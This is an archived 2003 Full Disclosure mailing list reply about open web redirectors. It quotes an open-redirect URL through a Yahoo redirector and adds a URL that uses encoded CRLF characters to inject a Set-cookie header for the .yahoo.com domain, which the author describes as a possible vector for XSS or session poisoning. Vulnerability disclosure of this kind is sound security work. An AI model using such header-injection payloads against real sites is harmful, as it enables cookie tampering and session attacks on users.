Full Disclosure: Re: CERT: Vulnerability in web redirectors

Nmap Security Scanner

Intro

Ref Guide

Install Guide

Download

Changelog

Book

Docs
Security Lists

Bugtraq

Basics

More
Security Tools

More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

Full Disclosure mailing list archives

Re: CERT: Vulnerability in web redirectors

From: David Leadbeater <dgl () dgl cx>
Date: Sat, 22 Mar 2003 21:19:16 +0000

Georgi Guninski wrote:

Like this one?:
--------------------
http://srd.yahoo.com/S=2766679:WS1/R=1/K=microsoft+sux/H=0/T=1048357500/F=131cc5f493bf26b0a115b6debc24d362/*http://www.cryptome.org
--------------------
(may be wrapped)


That site also demonstrates another issue with this type of HTTP Redirector
that has been mentioned as a security risk before:
http://srd.yahoo.com/S=2766679:WS1/R=1/K=microsoft+sux/H=0/T=1048357500/F=131cc5f493bf26b0a115b6debc24d362/*http://www.cryptome.org%0D%0ASet-cookie:%20foo%3D123%3B%%20domain%3D.yahoo.com%3B%20path%3D/

It adds a cookie for the whole .yahoo.com domain, this could be an attack
vector for other XSS (I wouldn't be surprised if there is less checking
done on cookie input) or session poisoning type attacks.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

By Date By Thread

Current thread:

CERT: Vulnerability in web redirectors hack4life (Mar 21)
- Re: CERT: Vulnerability in web redirectors Kurt Seifried (Mar 22)
  - Re: CERT: Vulnerability in web redirectors Georgi Guninski (Mar 22)
    - Re: CERT: Vulnerability in web redirectors David Leadbeater (Mar 22)
- <Possible follow-ups>
- Fw: CERT: Vulnerability in web redirectors http-equiv () excite com (Mar 22)